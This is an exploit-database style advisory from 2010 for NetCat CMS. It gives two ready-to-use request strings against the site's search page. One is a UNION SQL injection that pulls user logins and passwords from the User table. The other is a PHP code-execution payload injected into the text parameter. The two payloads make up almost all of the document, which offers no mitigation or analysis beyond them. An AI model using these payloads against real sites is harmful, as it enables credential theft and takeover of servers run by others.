NetCat CMS suffers from code execution and remote SQL injection vulnerabilities.
d69067d061f79f3e2e198323b4f2e877fbf6e5904336a2db3b1ceb373eb50146
# Exploit Title: NetCat CMS Code exec, SQL-injection
# Google Dork: none
# Date: 28.11.2010
# Author: brain[pillow]
# Software Link: http://netcat.ru/
# Version: UNKNOWN
On different versions of this software next vulnerabilities are availible:
=======================================================
# Sql-injection:
/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23
=======================================================
# Code exec:
/search/?action=index&text={${phpinfo()}}